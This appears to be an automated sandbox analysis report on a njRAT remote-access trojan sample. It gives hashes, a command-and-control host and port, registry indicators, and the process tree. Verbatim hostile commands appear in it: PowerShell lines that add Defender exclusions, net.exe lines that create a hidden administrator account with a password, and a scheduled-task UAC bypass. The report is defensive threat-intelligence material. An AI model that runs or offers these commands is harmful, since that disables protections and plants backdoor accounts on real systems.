Analysis
-
max time kernel
148s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2022, 06:51
Static task
static1
Behavioral task
behavioral1
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win10v2004-20220812-en
General
-
Target
6a6b2af0716cb8308dddae55dd325253.exe
-
Size
1.4MB
-
MD5
6a6b2af0716cb8308dddae55dd325253
-
SHA1
691556a82280d270bd0f763f1213b43c6c4c0b6d
-
SHA256
2cb6acd25b8d00468dd89658dc948836f92000e031085b6b3c798eb1504157df
-
SHA512
e517c7070e4c20eb16acc1dfa98c016a01a9fc66b1944c30e5270d3e616770804553140ff5b3b35c49c659b39e59cf999dc8fa5c00e9520bd57e6c9872d83f11
-
SSDEEP
24576:BxDQqQS0hvzxBbNLWYhMehi1VH/mUwz9md3Nz1OPSvu+1SHgYxw4d+q:BxQSEbBhMe+VOVBmfxfu+1SH1w40
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
4Mekey.myftp.biz:2411
18951a269d7
-
reg_key
18951a269d7
-
splitter
@!#&^%$
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions 6a6b2af0716cb8308dddae55dd325253.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools 6a6b2af0716cb8308dddae55dd325253.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6a6b2af0716cb8308dddae55dd325253.exe\"" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4920 set thread context of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\b9xe33Q 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\w6qHIwG.raw 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe 6a6b2af0716cb8308dddae55dd325253.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4768 powershell.exe 4768 powershell.exe 368 powershell.exe 2380 powershell.exe 3228 powershell.exe 3152 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 368 powershell.exe 1804 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 1932 powershell.exe 2380 powershell.exe 3228 powershell.exe 3152 powershell.exe 3152 powershell.exe 1804 powershell.exe 1804 powershell.exe 1932 powershell.exe 1932 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 4920 6a6b2af0716cb8308dddae55dd325253.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4920 wrote to memory of 4768 4920 6a6b2af0716cb8308dddae55dd325253.exe 82 PID 4920 wrote to memory of 4768 4920 6a6b2af0716cb8308dddae55dd325253.exe 82 PID 4920 wrote to memory of 4768 4920 6a6b2af0716cb8308dddae55dd325253.exe 82 PID 4920 wrote to memory of 1812 4920 6a6b2af0716cb8308dddae55dd325253.exe 84 PID 4920 wrote to memory of 1812 4920 6a6b2af0716cb8308dddae55dd325253.exe 84 PID 4920 wrote to memory of 1812 4920 6a6b2af0716cb8308dddae55dd325253.exe 84 PID 1812 wrote to memory of 1104 1812 net.exe 86 PID 1812 wrote to memory of 1104 1812 net.exe 86 PID 1812 wrote to memory of 1104 1812 net.exe 86 PID 4920 wrote to memory of 4108 4920 6a6b2af0716cb8308dddae55dd325253.exe 87 PID 4920 wrote to memory of 4108 4920 6a6b2af0716cb8308dddae55dd325253.exe 87 PID 4920 wrote to memory of 4108 4920 6a6b2af0716cb8308dddae55dd325253.exe 87 PID 4108 wrote to memory of 2108 4108 net.exe 89 PID 4108 wrote to memory of 2108 4108 net.exe 89 PID 4108 wrote to memory of 2108 4108 net.exe 89 PID 4920 wrote to memory of 532 4920 6a6b2af0716cb8308dddae55dd325253.exe 90 PID 4920 wrote to memory of 532 4920 6a6b2af0716cb8308dddae55dd325253.exe 90 PID 4920 wrote to memory of 532 4920 6a6b2af0716cb8308dddae55dd325253.exe 90 PID 532 wrote to memory of 2664 532 net.exe 92 PID 532 wrote to memory of 2664 532 net.exe 92 PID 532 wrote to memory of 2664 532 net.exe 92 PID 4920 wrote to memory of 344 4920 6a6b2af0716cb8308dddae55dd325253.exe 93 PID 4920 wrote to memory of 344 4920 6a6b2af0716cb8308dddae55dd325253.exe 93 PID 4920 wrote to memory of 344 4920 6a6b2af0716cb8308dddae55dd325253.exe 93 PID 344 wrote to memory of 1076 344 net.exe 95 PID 344 wrote to memory of 1076 344 net.exe 95 PID 344 wrote to memory of 1076 344 net.exe 95 PID 4920 wrote to memory of 4496 4920 6a6b2af0716cb8308dddae55dd325253.exe 96 PID 4920 wrote to memory of 4496 4920 6a6b2af0716cb8308dddae55dd325253.exe 96 PID 4920 wrote to memory of 4496 4920 6a6b2af0716cb8308dddae55dd325253.exe 96 PID 4920 wrote to memory of 368 4920 6a6b2af0716cb8308dddae55dd325253.exe 98 PID 4920 wrote to memory of 368 4920 6a6b2af0716cb8308dddae55dd325253.exe 98 PID 4920 wrote to memory of 368 4920 6a6b2af0716cb8308dddae55dd325253.exe 98 PID 4920 wrote to memory of 2380 4920 6a6b2af0716cb8308dddae55dd325253.exe 100 PID 4920 wrote to memory of 2380 4920 6a6b2af0716cb8308dddae55dd325253.exe 100 PID 4920 wrote to memory of 2380 4920 6a6b2af0716cb8308dddae55dd325253.exe 100 PID 4920 wrote to memory of 3228 4920 6a6b2af0716cb8308dddae55dd325253.exe 102 PID 4920 wrote to memory of 3228 4920 6a6b2af0716cb8308dddae55dd325253.exe 102 PID 4920 wrote to memory of 3228 4920 6a6b2af0716cb8308dddae55dd325253.exe 102 PID 4920 wrote to memory of 3152 4920 6a6b2af0716cb8308dddae55dd325253.exe 104 PID 4920 wrote to memory of 3152 4920 6a6b2af0716cb8308dddae55dd325253.exe 104 PID 4920 wrote to memory of 3152 4920 6a6b2af0716cb8308dddae55dd325253.exe 104 PID 4920 wrote to memory of 1804 4920 6a6b2af0716cb8308dddae55dd325253.exe 106 PID 4920 wrote to memory of 1804 4920 6a6b2af0716cb8308dddae55dd325253.exe 106 PID 4920 wrote to memory of 1804 4920 6a6b2af0716cb8308dddae55dd325253.exe 106 PID 4920 wrote to memory of 1932 4920 6a6b2af0716cb8308dddae55dd325253.exe 108 PID 4920 wrote to memory of 1932 4920 6a6b2af0716cb8308dddae55dd325253.exe 108 PID 4920 wrote to memory of 1932 4920 6a6b2af0716cb8308dddae55dd325253.exe 108 PID 4920 wrote to memory of 4256 4920 6a6b2af0716cb8308dddae55dd325253.exe 110 PID 4920 wrote to memory of 4256 4920 6a6b2af0716cb8308dddae55dd325253.exe 110 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 PID 4920 wrote to memory of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"1⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ADMIN~1 /add3⤵PID:2108
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup users "Admin" /add2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users "Admin" /add3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del2⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators "Admin" /del3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I2⤵PID:4496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"2⤵PID:4256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD57c3087a0aee7c503ba955ae610dbe17f
SHA1a54f5fb575aaeb82a2173f8c35fdd998e8fbd6f8
SHA2563bb2c4a3ea0d707277302c1db7325caec9fecb57ba70cc16f572bbc95a240290
SHA5129b6b443ab98c1b331dcb6d61e92ed67f1470f51f5c780f80a669c93ab10e41d60d17d9e3f2aeee379d08c2854188a988ee7709285d1d4ace7e444994c46ae02f
-
Filesize
18KB
MD57c3087a0aee7c503ba955ae610dbe17f
SHA1a54f5fb575aaeb82a2173f8c35fdd998e8fbd6f8
SHA2563bb2c4a3ea0d707277302c1db7325caec9fecb57ba70cc16f572bbc95a240290
SHA5129b6b443ab98c1b331dcb6d61e92ed67f1470f51f5c780f80a669c93ab10e41d60d17d9e3f2aeee379d08c2854188a988ee7709285d1d4ace7e444994c46ae02f
-
Filesize
18KB
MD5668c5594ff4dd020220942a9ac26b6ef
SHA1b8af808417375697f20ccedc0566c227ea724b88
SHA2567e21033009816712729472a94727ec2996499b22f8eacc5eb3cfbec7283ed50e
SHA512c5c7de4128a88c296324ef6d5e2bd67ee6da8aca6489632855d9b8f8d1a59d66cf87a1e3b2e2f03a932c4c38ecfa5cd3394d5191671e92442c63d6898ba4a299
-
Filesize
18KB
MD5cbb25066e0804b16bfc9f752af051ea6
SHA14b5bb186ab6c62a8cd80e995a71f93369d19f35e
SHA25678b8f76876de25a28bf87c39da2dd0b2c01e70bfc101c8d25aad046db376527c
SHA51273baf74d38102a7ae9b9617b1db471e09032f0c9376b091f0d76f019e0ade49bee4115a791d3aed250c48417c9f6910791fa6742f50a63b8be1d19f8e6686bac
-
Filesize
18KB
MD56fd551029db2c93e1a1d8b9d7cf0d816
SHA13e35dc141094c434a000627d446c2558a0d8b961
SHA256420326958326c6db11d8ff589d6f72f7efbf7acfa37befe9345a64d126077014
SHA5129545da834b53bd693eda01b8a828eddc3964288ab0f1ba8ffde54a85a9357fde50e133c9ba9527df68f9abeec7c2d15db0ffcb07463d6b2f95404d823d29c4f6
-
Filesize
64B
MD5b8c6445e99c777b6a50e4e20d9c403d7
SHA1208ab6812378b5ca3aa946049c8a6f8178168677
SHA256139634c39cc9afbeb22ea86ff528eb196f8dbfc592cc8a9e5b2ff15e199cf77a
SHA512eb3ad9ddc2843b22e7f198f0b88a5e92a8da0463b48a54d74c7b1a7314012d3670efede4766b9a0c7c161835b6237847c7ccca77fe4e56c3d0216193b371ed05